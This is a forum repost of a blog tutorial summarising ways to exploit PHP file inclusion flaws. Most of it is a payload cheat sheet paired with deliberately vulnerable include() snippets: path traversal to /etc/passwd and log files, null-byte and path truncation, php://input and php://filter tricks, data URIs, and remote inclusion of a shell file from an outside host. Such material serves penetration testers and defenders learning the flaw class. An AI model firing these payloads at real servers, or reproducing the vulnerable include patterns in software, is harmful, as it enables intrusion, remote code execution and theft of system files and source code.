Jump to content
Nytro

Exploiting PHP File Inclusion – Overview

By Nytro, in Tutoriale in engleza

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Exploiting PHP File Inclusion – Overview

Recently I see a lot of questions regarding PHP File Inclusions and the possibilities you have. So I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like it to have them summed up at one place.

Basic Local File Inclusion:

1<?php include("includes/" . $_GET['file']); ?>

  • Including files in the same directory:
    ?file=.htaccess
  • Path Traversal:
    ?file=../../../../../../../../../var/lib/locate.db
    (this file is very interesting because it lets you search the filesystem, other files)
  • Including injected PHP code:
    ?file=../../../../../../../../../var/log/apache/error.log
    (you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.). Temporarily uploaded files might work too.

Limited Local File Inclusion:

1<?php include("includes/" . $_GET['file'] . ".htm"); ?>

  • Null Byte Injection:
    ?file=../../../../../../../../../etc/passwd%00
    (requires magic_quotes_gpc=off)
  • Directory Listing with Null Byte Injection:
    ?file=../../../../../../../../../var/www/accounts/%00
    (UFS filesystem only, requires magic_quotes_gpc=off, more details here)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
    (more details see here and here)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd……………. …
    (Windows only, more details here)
  • Reverse Path Truncation:
    ?file=../../../../ [...] ../../../../../etc/passwd
    (more details here)

Basic Remote File Inclusion

1<?php include($_GET['file']); ?>

  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using PHP stream php://input:
    ?file=php://input
    (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
  • Using PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source because it wont get evaluated in base64. More details here and here)
  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (requires allow_url_include=On)
  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (makes sense if firewalled or only whitelisted domains allowed)

Limited Remote File Inclusion

1<?php include($_GET['file'] . ".htm"); ?>

  • ?file=http://websec.wordpress.com/shell
  • ?file=http://websec.wordpress.com/shell.txt?
  • ?file=http://websec.wordpress.com/shell.txt%23(requires allow_url_fopen=On and allow_url_include=On)

Static Remote File Inclusion:

1<?php include("http://192.168.1.10/config.php"); ?>

  • Man In The Middle
    (lame indeed, but often forgotten)

Of course you can combine all the tricks. If you are aware of any other or interesting files to include please leave a comment and I’ll add them.

Sursa: Exploiting PHP File Inclusion – Overview « Reiners’ Weblog

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...